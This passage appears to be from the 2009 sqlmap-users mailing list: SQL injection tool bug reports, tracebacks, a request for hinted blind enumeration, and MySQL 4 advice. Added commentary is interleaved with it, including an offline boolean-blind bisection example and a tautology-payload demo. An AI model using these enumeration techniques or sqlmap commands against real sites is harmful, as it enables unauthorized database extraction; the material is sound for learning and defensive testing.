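    except ValueError as err:
        print("hardened rejects:", err)
```

The second print returns every row because the bare parameter turns the WHERE clause into a tautology, while the third returns nothing because the escaped value never leaves its quoted literal; the hardened variant refuses the non-integer before any SQL is built.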
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-11 10:03:17
|
Hi Andre,

This is fixed in sqlmap version from subversion repository. Give it a try if you want.

Cheers,
B

On Fri, Nov 6, 2009 at 14:18, Andre Stoffel <ast...@it...> wrote:
> ...
> sqlmap version: 0.7
>
> Python version: 2.6.2
>
> ...
> File "/usr/share/sqlmap/lib/controller/controller.py", line 84, in __selectInjection
>
> return injData[index]
>
> UnboundLocalError: local variable 'index' referenced before assignment
> ...

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Andres R. <and...@gm...> - 2009-11-06 17:41:48
|
Eric,

On Fri, Nov 6, 2009 at 2:23 PM, Eric H <eri...@gm...> wrote:
> I'm not terribly experienced with Python or I'd implement this myself - it
> seems like it would be very simple.
>
> During brute-force blind SQL injection (while enumerating a single character
> at a time), I frequently know what the DB/table/column name is within the
> first 3 or 4 characters or have a pretty good idea what the next character
> is.
>
> During that input loop, if the program were simply to accept keyboard input,
> tag that character and immediately try that specific character on the next
> iteration... It would double or triple the speed I could enumerate table
> values WHILE decreasing the load on the server during testing. Relying on
> the good old fashioned human pattern matching is a low-tech solution, but
> seems to have a high reward for a small amount of work.
>
> I'll eat my shoe if this feature is already implemented and I just missed
> it.

This is already implemented in the sqlmap modification that I did for w3af. If you want you can take it from there,

Cheers,

> Thanks!
>
> Eric
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus
> on what you do best, core application coding. Discover what's new with
> Crystal Reports now. http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/ |
From: Eric H <eri...@gm...> - 2009-11-06 17:24:06
|
I'm not terribly experienced with Python or I'd implement this myself - it seems like it would be very simple.

During brute-force blind SQL injection (while enumerating a single character at a time), I frequently know what the DB/table/column name is within the first 3 or 4 characters or have a pretty good idea what the next character is.

During that input loop, if the program were simply to accept keyboard input, tag that character and immediately try that specific character on the next iteration... It would double or triple the speed I could enumerate table values WHILE decreasing the load on the server during testing. Relying on the good old fashioned human pattern matching is a low-tech solution, but seems to have a high reward for a small amount of work.

I'll eat my shoe if this feature is already implemented and I just missed it.

Thanks!

Eric |
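The idea in Eric's request and Andrés's reply above, as an added example that is neither sqlmap's nor the w3af modification's code: boolean-blind character inference by bisection over the ASCII range, with an optional predicted next character tried first and bisection as the fallback. The oracle is a local function over a constructed secret string, so the example runs offline, and it counts oracle queries, which is the per-character request volume a defender sees in web server logs and which a correct hint cuts from seven to one.

```python
# Added example: blind boolean inference with a 'next character' hint.
# The oracle is local and the secret is constructed; nothing here talks
# to a network.

SECRET = "information_schema"  # constructed sample value to recover


class LocalOracle:
    """Answers the two boolean questions a blind-inference loop asks, and
    counts how many it was asked (each one would be an HTTP request)."""

    def __init__(self, secret):
        self.secret = secret
        self.queries = 0

    def _code(self, pos):
        # Past the end the value reads as 0, which the loop treats as the
        # end-of-string marker.
        return ord(self.secret[pos]) if pos < len(self.secret) else 0

    def greater_than(self, pos, value):
        self.queries += 1
        return self._code(pos) > value

    def equals(self, pos, value):
        self.queries += 1
        return self._code(pos) == value


def infer_char(oracle, pos, hint=None, low=0, high=127):
    """Return the code of the character at pos. A correct hint costs one
    query; otherwise bisection over [low, high] costs log2(range) queries."""
    if hint is not None and oracle.equals(pos, ord(hint)):
        return ord(hint)
    while low < high:
        mid = (low + high) // 2
        if oracle.greater_than(pos, mid):
            low = mid + 1   # answer lies above mid
        else:
            high = mid      # answer is mid or below
    return low


def infer_string(oracle, predictor=None, max_len=64):
    """Recover characters until the end marker; predictor(prefix) may
    return a guessed next character or None (no guess)."""
    prefix = ""
    for pos in range(max_len):
        hint = predictor(prefix) if predictor else None
        code = infer_char(oracle, pos, hint=hint)
        if code == 0:
            break
        prefix += chr(code)
    return prefix


def dictionary_predictor(words):
    """Automates the 'human pattern matching' from the thread: guess the
    next character from the first known word consistent with the prefix."""
    def predict(prefix):
        for word in words:
            if word.startswith(prefix) and len(word) > len(prefix):
                return word[len(prefix)]
        return None
    return predict


if __name__ == "__main__":
    plain = LocalOracle(SECRET)
    print(infer_string(plain), "recovered with", plain.queries, "queries")
    hinted = LocalOracle(SECRET)
    guess = dictionary_predictor(["information_schema", "mysql"])
    print(infer_string(hinted, guess), "recovered with", hinted.queries, "queries")
```

With a 128-value range every character costs exactly seven bisection queries, so the plain run needs 7 × (length + 1) queries including the end marker; a predictor that is right every time needs one query per character, and a wrong guess costs one extra query before bisection takes over, so a bad predictor is only marginally worse than none.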
From: Andre S. <ast...@it...> - 2009-11-06 14:36:34
|
(root@B004)-(/home/ast-moonshine) $ sqlmap -u "http://www.xxxxxxxxx.yy/get_int.php?id=1" -v 5
.
.
.
.
[14:59:25] [WARNING] Invalid choice, retry
there were multiple injection points, please select the one to use to go ahead:
[0] place: Cookie, parameter: fe_typo_user, type: stringsingle (default)
[1] place: GET, parameter: id, type: numeric
[q] Quit
> 0
[14:59:30] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 84, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 231, in start
    injDataSelected = __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 82, in __selectInjection
    __selectInjection(injData)
  File "/usr/share/sqlmap/lib/controller/controller.py", line 84, in __selectInjection
    return injData[index]
UnboundLocalError: local variable 'index' referenced before assignment

[*] shutting down at: 14:59:30

(root@B004)-(/home/ast-moonshine) $

signature-ast-itw-kms |
From: Andres R. <and...@gm...> - 2009-11-01 15:36:15
|
Bernardo,

I'm just guessing without really looking at the code, but this seems to be because of a fixed path "sqlmap-0.7/shell/uploader.php" in your code, that uses "/" as a directory separator, when in Windows that is not valid. You should use things like:

uploader = os.path.join(os.getcwd(),'shell','uploader.php')

Hope this helps,

Cheers,

On Sun, Nov 1, 2009 at 12:23 PM, Adi Mutu <adi...@ya...> wrote:
>
> [17:14:37] [ERROR] unhandled exception in sqlmap/0.7, please copy the
> command line and the following text and send by e-mail to sqlmap-
> us...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6
> Operating system: win32
> Traceback (most recent call last):
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\sqlmap.py", line 84, in main
>     start()
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\controller.py", line 263, in start
>     action()
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\action.py", line 140, in action
>     conf.dbmsHandler.osShell()
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 295, in osShell
>     backdoorUrl = self.__webBackdoorInit()
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 170, in __webBackdoorInit
>     uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
>   File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\core\common.py", line 384, in fileToStr
>     filePointer = open(fileName, "r")
> IOError: [Errno 2] No such file or directory: 'C:\\Documents and Settings\\Adrian\\Desktop\\toolz\\sqli\\sqlmap-0.7/shell/uploader.php'
>
>
> [*] shutting down at: 17:14:37
>
>
>
> ------------------------------------------------------------------------------
> Come build with us! The BlackBerry(R) Developer Conference in SF, CA
> is the only developer event you need to attend this year. Jumpstart your
> developing skills, take BlackBerry mobile applications to market and stay
> ahead of the curve. Join us from November 9 - 12, 2009. Register now!
> http://p.sf.net/sfu/devconference
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/ |
From: Adi M. <adi...@ya...> - 2009-11-01 15:24:09
|
[17:14:37] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sqlmap-us...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6
Operating system: win32
Traceback (most recent call last):
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\sqlmap.py", line 84, in main
    start()
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\controller.py", line 263, in start
    action()
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\controller\action.py", line 140, in action
    conf.dbmsHandler.osShell()
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 295, in osShell
    backdoorUrl = self.__webBackdoorInit()
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\plugins\generic\takeover.py", line 170, in __webBackdoorInit
    uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
  File "C:\Documents and Settings\Adrian\Desktop\toolz\sqli\sqlmap-0.7\lib\core\common.py", line 384, in fileToStr
    filePointer = open(fileName, "r")
IOError: [Errno 2] No such file or directory: 'C:\\Documents and Settings\\Adrian\\Desktop\\toolz\\sqli\\sqlmap-0.7/shell/uploader.php'

[*] shutting down at: 17:14:37 |
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-01 11:53:01
|
Hi Windom,

Can you please give it a try to latest sqlmap version from svn repository? In case you get the same traceback, please get back to me.

Cheers,
Bernardo

On Wed, Oct 7, 2009 at 13:52, Windom Earle <win...@ma...> wrote:
> While doing cookie parameter injection for "--dump-all" option...
>
> Error log:
>
> there were multiple injection points, please select the one to use to go ahead:
> [0] place: User-Agent, parameter: User-Agent, type: numeric (default)
> [1] place: Cookie, parameter: sessiondata, type: numeric
> [q] Quit
>> 1
> [17:35:50] [INFO] testing for parenthesis on injectable parameter
> [17:36:51] [INFO] the injectable parameter requires 3 parenthesis
> [17:36:52] [INFO] testing MySQL
> [17:37:12] [WARNING] the back-end DMBS is not MySQL
> [17:37:12] [INFO] testing Oracle
> [17:37:32] [WARNING] the back-end DMBS is not Oracle
> [17:37:32] [INFO] testing PostgreSQL
> [17:37:54] [WARNING] the back-end DMBS is not PostgreSQL
> [17:37:54] [INFO] testing Microsoft SQL Server
> [17:38:17] [INFO] confirming Microsoft SQL Server
> [17:38:40] [INFO] the back-end DBMS is Microsoft SQL Server
>
> web application technology: Apache 2.2.11, PHP 5.2.9
> back-end DBMS: Microsoft SQL Server 2000
>
> [17:38:40] [INFO] fetching tables
> [17:38:40] [INFO] fetching database names
> [17:38:40] [INFO] fetching number of databases
> [17:38:40] [INFO] retrieved: [17:38:40] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sqlmap...@li.... The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6.1
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 84, in main
>   File "lib\controller\controller.pyc", line 263, in start
>   File "lib\controller\action.pyc", line 120, in action
>   File "plugins\generic\enumeration.pyc", line 1081, in dumpAll
>   File "plugins\dbms\mssqlserver.pyc", line 337, in getTables
>   File "plugins\generic\enumeration.pyc", line 661, in getDbs
>   File "lib\request\inject.pyc", line 378, in getValue
>   File "lib\request\inject.pyc", line 308, in __goInferenceProxy
>   File "lib\request\inject.pyc", line 99, in __goInferenceFields
>   File "lib\request\inject.pyc", line 58, in __goInference
>   File "lib\techniques\blind\inference.pyc", line 232, in bisection
>   File "lib\techniques\blind\inference.pyc", line 105, in getChar
> TypeError: not all arguments converted during string formatting

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2009-11-01 11:49:32
|
Hi Kyle,

On Sat, Oct 3, 2009 at 19:42, Kyle Anderson <ky...@xk...> wrote:
> So it seems that you cannot do a --dump-all on a mysql 4 server
> because information_schema is not available.

It's not a lack of sqlmap. By design all versions of MySQL < 5.0 do not have information_schema so, as far as I know, no way to automatically identify tables and columns within a database.

> But can't I just do a "show databases;" in a sql shell? I tried but I
> can't seem to get the sql-shell to work (probably because it says I'm
> not a DBA)

The --sql-shell functionality does not work exactly like a direct connection with the MySQL console. Statements like show can not be supported (easily) within a SQL injection scenario.

On MySQL < 5.0 it is still possible to enumerate the databases via 'mysql' system database's 'db' table and sqlmap does it for you if you specify --dbs and it fingerprints an old version of MySQL. If it does not, then there's a bug, please report it.

Cheers,

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |